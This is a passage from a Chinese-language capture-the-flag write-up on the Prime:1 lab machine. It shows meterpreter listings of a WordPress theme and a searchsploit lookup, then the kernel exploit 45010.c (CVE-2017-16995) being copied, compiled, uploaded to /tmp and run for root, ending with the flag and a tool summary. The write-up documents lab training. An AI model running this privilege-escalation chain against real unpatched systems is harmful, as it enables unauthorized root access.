100644/rw-r--r-- 1608 fil 2018-12-14 05:33:42 -0500 footer.php 100644/rw-r--r-- 10035 fil 2019-01-02 21:04:50 -0500 functions.php 100644/rw-r--r-- 1870 fil 2019-04-16 04:30:54 -0400 header.php 100644/rw-r--r-- 2874 fil 2019-04-16 04:30:54 -0400 image.php 040755/rwxr-xr-x 4096 dir 2019-06-18 20:50:52 -0400 inc 100644/rw-r--r-- 1060 fil 2018-12-19 06:18:26 -0500 index.php 040755/rwxr-xr-x 4096 dir 2019-06-18 20:50:52 -0400 js 100644/rw-r--r-- 151698 fil 2018-12-14 05:33:42 -0500 package-lock.json 100644/rw-r--r-- 1531 fil 2018-12-14 05:33:42 -0500 package.json 100644/rw-r--r-- 765 fil 2018-12-14 05:33:42 -0500 page.php 100644/rw-r--r-- 219 fil 2018-12-14 05:33:42 -0500 postcss.config.js 100644/rw-r--r-- 3949 fil 2019-02-28 05:47:52 -0500 print.css 100644/rw-r--r-- 3320 fil 2019-04-07 09:18:52 -0400 print.scss 100644/rw-r--r-- 1735 fil 2019-05-07 22:06:56 -0400 readme.txt 040755/rwxr-xr-x 4096 dir 2019-06-18 20:50:52 -0400 sass 100644/rw-r--r-- 175535 fil 2018-12-14 05:33:42 -0500 screenshot.png 100644/rw-r--r-- 1344 fil 2018-12-14 05:33:42 -0500 search.php 100777/rwxrwxrwx 1111 fil 2024-06-05 10:32:55 -0400 secret.php 100644/rw-r--r-- 1785 fil 2018-12-19 06:24:12 -0500 single.php 100644/rw-r--r-- 159 fil 2019-01-18 21:38:50 -0500 style-editor-customizer.css 100644/rw-r--r-- 158 fil 2019-01-18 21:38:50 -0500 style-editor-customizer.scss 100644/rw-r--r-- 64981 fil 2019-02-13 21:40:50 -0500 style-editor.css 100644/rw-r--r-- 12830 fil 2019-02-13 21:40:50 -0500 style-editor.scss 100644/rw-r--r-- 212651 fil 2019-05-07 22:06:56 -0400 style-rtl.css 100644/rw-r--r-- 212849 fil 2019-05-07 22:06:56 -0400 style.css 100644/rw-r--r-- 2798 fil 2019-05-07 22:06:56 -0400 style.scss 040755/rwxr-xr-x 4096 dir 2019-06-18 20:50:52 -0400 template-partsmeterpreter 即将进行系统漏洞提权。系统信息Linux ubuntu 4.10.0-28-generic 3.3 Linux内核漏洞提权 3.3.1 漏洞查找 ┌──(root㉿kali)-[/home/kali/prime1] └─# searchsploit -w ubuntu 4.10.0-28 --------------------------------------------------------------------------------------------------------------- --------------------------------------------Exploit Title | URL --------------------------------------------------------------------------------------------------------------- -------------------------------------------- Linux Kernel 4.10.5 / 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | https://www.exploit-db.com/exploits/43234 Linux Kernel 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | https://www.exploit-db.com/exploits/45010 Ubuntu 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation | https://www.exploit-db.com/exploits/41760 --------------------------------------------------------------------------------------------------------------- -------------------------------------------- Shellcodes: No Results --------------------------------------------------------------------------------------------------------------- --------------------------------------------Paper Title | URL --------------------------------------------------------------------------------------------------------------- -------------------------------------------- Debian 5.0.6 / Ubuntu 10.04 - Webshell Remote Root Exploit | https://www.exploit-db.com/papers/15311 --------------------------------------------------------------------------------------------------------------- -------------------------------------------- 发现这个漏洞可以利用 Linux Kernel 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation ──(root㉿kali)-[/home/kali/prime1] └─# searchsploit ubuntu 4.10.0-28 ------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------Exploit Title | Path ------------------------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Linux Kernel 4.10.5 / 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c Linux Kernel 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c Ubuntu 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation | linux/local/41760.txt ------------------------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Shellcodes: No Results ------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------Paper Title | Path ------------------------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Debian 5.0.6 / Ubuntu 10.04 - Webshell Remote Root Exploit | english/15311-debian--5.0.6--ubu ------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------┌──(root㉿kali)-[/home/kali/prime1] └─# find / -name 45010.c find: ‘/run/user/1000/gvfs’: Permission denied find: ‘/run/user/130/gvfs’: Permission denied /root/45010.c /usr/share/exploitdb/exploits/linux/local/45010.c 获得poc路径 /usr/share/exploitdb/exploits/linux/local/45010.c 3.3.2 复制poc ┌──(root㉿kali)-[/home/kali/prime1] └─# cp /usr/share/exploitdb/exploits/linux/local/45010.c ./┌──(root㉿kali)-[/home/kali/prime1] └─# ls 45010.c shell.php 3.3.3 编译poc文件参考cve-2017-16995官方文档执行编译。 ┌──(root㉿kali)-[/home/kali/prime1] └─# gcc 45010.c -o 45010 -static┌──(root㉿kali)-[/home/kali/prime1] └─# ls 45010 45010.c shell.php 3.3.4 上传编译poc meterpreter upload /home/kali/prime1/45010 /tmp/45010 [*] Uploading : /home/kali/prime1/45010 - /tmp/45010 [*] Uploaded -1.00 B of 752.41 KiB (0.0%): /home/kali/prime1/45010 - /tmp/45010 [*] Completed : /home/kali/prime1/45010 - /tmp/45010 meterpreter cd /tmp meterpreter ls Listing: /tmp Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 041777/rwxrwxrwx 4096 dir 2024-06-05 10:08:11 -0400 .ICE-unix 041777/rwxrwxrwx 4096 dir 2024-06-05 10:08:11 -0400 .Test-unix 100444/r--r--r-- 11 fil 2024-06-05 10:08:17 -0400 .X0-lock 041777/rwxrwxrwx 4096 dir 2024-06-05 10:08:17 -0400 .X11-unix 041777/rwxrwxrwx 4096 dir 2024-06-05 10:08:11 -0400 .XIM-unix 041777/rwxrwxrwx 4096 dir 2024-06-05 10:08:11 -0400 .font-unix 100644/rw-r--r-- 770472 fil 2024-06-05 11:10:37 -0400 45010 041777/rwxrwxrwx 4096 dir 2024-06-05 10:08:11 -0400 VMwareDnD 040700/rwx------ 4096 dir 2024-06-05 10:08:28 -0400 systemd-private-7d99593754664a1a84c9bcbf4d955b30-colord.service-IA7clY 040700/rwx------ 4096 dir 2024-06-05 10:08:24 -0400 systemd-private-7d99593754664a1a84c9bcbf4d955b30-rtkit-daemon.service-KTk3vv 040700/rwx------ 4096 dir 2024-06-05 10:08:11 -0400 systemd-private-7d99593754664a1a84c9bcbf4d955b30-systemd-timesyncd.service-bXOvLg 040700/rwx------ 4096 dir 2024-06-05 10:08:13 -0400 vmware-root 日志显示已经成功上传。 3.3.5 执行编译poc 3.3.5.1 目录切换 meterpreter cd /tmp3.3.5.2 赋予可执行权限 meterpreter chmod x 45010 meterpreter ls Listing: /tmp Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 041777/rwxrwxrwx 4096 dir 2024-06-05 10:08:11 -0400 .ICE-unix 041777/rwxrwxrwx 4096 dir 2024-06-05 10:08:11 -0400 .Test-unix 100444/r--r--r-- 11 fil 2024-06-05 10:08:17 -0400 .X0-lock 041777/rwxrwxrwx 4096 dir 2024-06-05 10:08:17 -0400 .X11-unix 041777/rwxrwxrwx 4096 dir 2024-06-05 10:08:11 -0400 .XIM-unix 041777/rwxrwxrwx 4096 dir 2024-06-05 10:08:11 -0400 .font-unix 100000/--------- 770472 fil 2024-06-05 11:10:37 -0400 45010 041777/rwxrwxrwx 4096 dir 2024-06-05 10:08:11 -0400 VMwareDnD 040700/rwx------ 4096 dir 2024-06-05 10:08:28 -0400 systemd-private-7d99593754664a1a84c9bcbf4d955b30-colord.service-IA7clY 040700/rwx------ 4096 dir 2024-06-05 10:08:24 -0400 systemd-private-7d99593754664a1a84c9bcbf4d955b30-rtkit-daemon.service-KTk3vv 040700/rwx------ 4096 dir 2024-06-05 10:08:11 -0400 systemd-private-7d99593754664a1a84c9bcbf4d955b30-systemd-timesyncd.service-bXOvLg 040700/rwx------ 4096 dir 2024-06-05 10:08:13 -0400 vmware-root 3.3.5.3 执行编译文件 meterpreter shell Process 6025 created. Channel 2 created. ls 45010 VMwareDnD systemd-private-7d99593754664a1a84c9bcbf4d955b30-colord.service-IA7clY systemd-private-7d99593754664a1a84c9bcbf4d955b30-rtkit-daemon.service-KTk3vv systemd-private-7d99593754664a1a84c9bcbf4d955b30-systemd-timesyncd.service-bXOvLg vmware-root ./45010 whoami root find / -name *root* /tmp/vmware-root find: /run/user/108/gvfs: Permission denied cd /root ls enc enc.cpp enc.txt key.txt root.txt sql.py t.sh wfuzz wordpress.sql cat root.txt b2b17036da1de94cfb024540a8e7075a获得flag: b2b17036da1de94cfb024540a8e7075a 渗透总结在本次prime:1靶机渗透测试内容包括主机扫描nmap\netdiscover、端口扫描nmap\masscan、目录扫描dirb\dirsearch、wfuzz爆破、wpscan、msf、netcat、反弹shell、linux内核提权并获得flag等内容使用nmap进行主机发现和端口扫描使用dirbsearch进行目录扫描网页分析进行wfuzz爆破参数和值netcat监听反弹shelllinux内核提权,获得flag 参考文章 prime:1靶场arp-scan使用Netdiscover基本使用nmap详细使用教程黑客工具之whatweb详细使用教程dirsearch - Web path discoveryNetcat - 你需要知道的一切cve-2017-16995searchsploit漏洞查找工具使用指南(exploit-db.com 离线工具 exploitdb)WFUZZ使用教程prime-1渗透测试流程图

查看全文

http://www.w-s-a.com/news/4812/